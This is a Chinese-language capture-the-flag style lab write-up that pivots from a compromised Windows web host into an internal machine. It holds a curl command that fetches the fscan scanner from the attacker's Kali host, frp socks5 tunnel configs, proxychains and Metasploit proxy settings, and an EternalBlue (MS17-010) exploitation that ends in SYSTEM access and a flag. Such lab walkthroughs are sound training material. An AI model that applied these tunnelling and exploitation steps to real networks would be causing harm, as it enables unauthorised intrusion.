EP-Win8086

前言

本文是在已经攻破EP-web01的基础上,对其内网中的Win8086进行攻击,最终获取到其权限

漏洞扫描

由于上篇文章已经可以远程登录Web01,这里直接上传fscan的windows版本,并且进行漏扫

这里还是使用http传输文件

#kali里面
$ python -m http.server 80

#win
PS : curl 192.168.237.140/fscan.exe -O fscan.exe

好像扫到一个MS17-010的漏洞

对36进行扫描也是发现MS17-010的漏洞

搭建代理

(题外话:为什么我要使用外部的工具呢?因为msf自带的socks_proxy我这里尝试了好像用不了,或许是我操作有问题,不过有工具用也是可以的)

frp内网穿透工具

这里使用的是V6.0的版本,分别下载linuxwindows版本

[common]
bind_port = 7000
[common]
server_addr = 192.168.237.140 
server_port = 7000  
tls_enable = ture 

[plugin socks]
type = tcp  
plugin = socks5 
remote_port = 46075  
use_encryption = true
use_compression = true

其中windows的frp配置文件中的server_addr就是kali的IP,使用的代理端口就是46075

web01的主机上仍然使用curl -O的方式进行下载文件

最后两端开启frp服务

如图所示,frp代理开启成功

回到Kali

$ vim /etc/proxychains4.conf

在最下端如图配置即可

MS17-010

$ msfconsole

打开msfconsole,并且执行这两行命令,就不用再执行proxychains

setg Proxies socks5:127.0.0.1:46075 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。

然后正常的使用永恒之蓝的漏洞即可

这里值得注意的是我使用的是bind_tcp,这是一个正向链接,因为kali通过代理是能访问到8086主机,而反过来是不行的。

可以看到已经是最高权限了

在C盘的Users的John用户目录下拿到第二个flag

进入Shell,修改字符集为65001,不然会乱码

其他的似乎并没有什么可以利用的东西了,这个靶机应该也就这样了

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇